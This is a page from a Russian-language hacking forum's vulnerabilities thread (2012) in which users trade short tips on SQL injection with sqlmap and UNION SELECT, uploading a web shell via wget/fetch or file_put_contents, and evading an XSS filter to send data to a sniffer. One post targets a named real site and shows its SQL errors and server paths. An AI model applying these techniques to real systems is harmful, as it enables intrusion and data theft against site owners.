HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #20721  
Старый 26.05.2012, 23:51
dynda2000
Guest
Сообщений: n/a
Провел на форуме:
2422

Репутация: 0
По умолчанию

Цитата:
Сообщение от попугай  
попугай said:
лей сразу непосредственно шелл
Подскажи как это делается? если не затруднит
 
Ответить с цитированием

  #20722  
Старый 27.05.2012, 00:33
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию

Цитата:
Сообщение от HeaVeNSeR  
HeaVeNSeR said:
ребят,подскажите,плз...как скормить sqlmap'у блайнд-скулю типа этой (suffix .html)
http://site.com/common/
[sql-inj]
.html
havij её норм берет,как http://site.com/common/
%Inject_Here%
.html
и где можно почитать про suffix и prefix в скулях...искал в сети,ничего норм не нашел...?
Подскажите,пожалуйста
В sqlmap поставьте * в том месте где уязвимость.

Пример: http://site.com/common/*.html

to dynda2000

Почитайте про system(wget/fetch), там же сразу и file_put_contents() и выбирайте как Вам больше по душе!
 
Ответить с цитированием

  #20723  
Старый 27.05.2012, 15:59
абвгдешка
Guest
Сообщений: n/a
Провел на форуме:
9121

Репутация: 1
По умолчанию

w3af нашёл уязвимость (ocCommanding), первый раз с ней сталкиваюсь как с ней работать?
 
Ответить с цитированием

  #20724  
Старый 27.05.2012, 17:22
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Всем привет, вобщем такой вопрос

есть скуля в пост запросе

на страницу выводит три ошибки

id=2'

Цитата:
Сообщение от None  
Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home//public_html/new_stavka.php on line 65
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home//public_html/new_stavka.php on line 71
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/public_html/new_stavka.php on line 75
начинаю подбирать колонки

на трёх

id=2'+union+select+1,2,3--+

выводит только одну ошибку

mysql_fetch_array()

и обычный текст страницы(прямого вывода на станицу нету), дальше перебераю и имею все теже три ошибки, собствено, дальше крутить нету смысла, как я дальше в таком случае могу получить какойю либо инфу из БД в таком случае?
 
Ответить с цитированием

  #20725  
Старый 27.05.2012, 17:48
bodrich
Guest
Сообщений: n/a
Провел на форуме:
5709

Репутация: 0
По умолчанию

qaz, error based методом попробывать мб ?
 
Ответить с цитированием

  #20726  
Старый 27.05.2012, 18:41
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Цитата:
Сообщение от bodrich  
bodrich said:
qaz
, error based методом попробывать мб ?
ето не тот вывод об ошибке когда юзают error based
 
Ответить с цитированием

  #20727  
Старый 27.05.2012, 20:15
justonline
Guest
Сообщений: n/a
Провел на форуме:
179355

Репутация: 53
По умолчанию

Цитата:
Сообщение от justonline  
justonline said:
нашел по сути банальную xss в input.
проблема состоит в том, что ничего не фильтруется кроме двойного слеша в ссылке на снифер. // - удаляет. если ///, то оставляет один... дальнейшие манипуляции с слешом не приносят успехов.
знатоки Js, подскажите пожалуйста возможную реализацию, что бы ссылка не фильтровалась. Мне для общего развития, уязвимость все-равно админам сдам. я уже пол ночи сижу и мучаюсь... и табуляцию режет между этими слешами и пробелы.
где то проскакивал способ через eval, но я не осилил.
+ ограничение на 100 символов.
+ работа только в пределах тега
никто не может помочь?)
 
Ответить с цитированием

  #20728  
Старый 28.05.2012, 00:27
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от justonline  
justonline said:
никто не может помочь?)
что на счет того чтоб перевести в урленкод?, или криптованую ссылку где не использауется двойные слеши? вариантов уйма, блескни умом, вопрос достаточно бонален воспользуйся гуглом!!!
 
Ответить с цитированием

  #20729  
Старый 28.05.2012, 12:36
mr_zedox
Guest
Сообщений: n/a
Провел на форуме:
9778

Репутация: 0
По умолчанию

Нашел XSS в post запросе, если я правильно понял то это активка, что через неё сделать можно, если есть полная свобода:

+ни чего ни фильтруется

+работают script src=lyaya.js

и т.д.
 
Ответить с цитированием

  #20730  
Старый 28.05.2012, 12:47
Vanzent
Guest
Сообщений: n/a
Провел на форуме:
335

Репутация: 0
По умолчанию

Как победить?

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]tabu72[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ru[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]catalog[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]93[/COLOR][COLOR="#007700"])+[/COLOR][COLOR="#0000BB"]union[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]select[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]+--+[/COLOR][/COLOR
Выдает

Код:
Code:
user warning: You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near 'group by td.name' at line 9 query:
catalog_taxonomy_select_brands /* Гость : 
catalog_taxonomy_select_brands */ SELECT td.tid, td.name 
FROM term_node tn left join term_node tnn on tn.nid = tnn.nid
 left join term_data td on td.tid = tnn.tid left join node n on tn.nid 
= n.nid left join content_type_tovar tt on tn.nid = tt.nid WHERE 
tn.tid in ( 93) union select 1 -- ) and tnn.tid not in ( 93) union 
select 1 -- ) group by td.name in /var/www/sites/tabu72.ru/sites/
all/modules/catalog/catalog.module on line 895.      user warning:
 The used SELECT statements have a different number of columns
 query: pager_query /* Гость : pager_query */ SELECT tn.nid, 
td.name, td.tid FROM term_node tn left join term_node tnn on 
tn.nid = tnn.nid left join term_data td on td.tid = tnn.tid left join 
node n on tn.nid = n.nid left join content_type_tovar tt on tn.nid
 = tt.nid WHERE tn.tid in ( 93) union select 1 -- ) and tnn.tid not in 
( 93) union select 1 -- ) and IFNULL(tt.field_price_sale_value, 
0)=0 and tt.field_dateupdate_value is NULL order by n.title asc 
LIMIT 0, 12 in /var/www/sites/tabu72.ru/sites/all/modules/
catalog/catalog.module on line 814.
Параметр используется во множественных запросах. Если добавить еще 1 колонку, то появятся еще 2 ошибки
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ